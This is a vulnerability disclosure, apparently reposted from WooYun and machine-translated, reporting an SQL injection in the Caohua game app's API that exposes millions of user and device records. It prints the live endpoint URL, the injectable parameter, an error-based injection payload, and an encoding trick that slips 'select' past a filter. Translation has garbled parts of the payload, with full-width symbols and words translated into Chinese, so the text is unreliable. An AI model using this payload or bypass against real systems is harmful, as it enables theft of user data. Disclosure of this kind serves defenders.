漏洞标题 草花游戏官方APP存在SQL注入（涉及700W +用户数据/800W +设备信息） 相关制造商 Caohua.com 漏洞作者 过路人 提交时间 2016-05-05 09: 21 公共时间 2016-06-19 11: 40 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 SQL注入 漏洞详细信息 目标：草花游戏Android APP 测试发现在以下位置有SQL注入:(注入参数PUserName，错误注入） http://switch.api.caohua.com/Api/CheckSalf.ashx?DeviceNo=B30FE6BC79CA96D418E41790D80A8E1B&Times=1462374589&UserID=639&AppID=133&PUserName=374587368&SourceID=576&Sign=C92A3457E748E4813A7B3AAD294595FA 有效载荷： http://switch.api.caohua.com/Api/CheckSalf.ashx?DeviceNo=B30FE6BC79CA96D418E41790D80A8E1B&Times=1462374589&UserID=639&AppID=133&PUserName=374587368%27%20AND%203750=CONVERT%28INT,user%29%20 - ％20％20-＆安培;的SourceID=576安培;符号=C92A3457E748E4813A7B3AAD294595FA 由于选择被过滤，因此可以绕过编码 选择 - >％u0073elect 漏洞证明： 1，当前数据库用户 2，所有数据库 3，用户表，涉及700W +用户数据/800W +设备信息，具体不深〜 修理计划： 请多指教〜 版权声明：请注明出处。居民A @乌云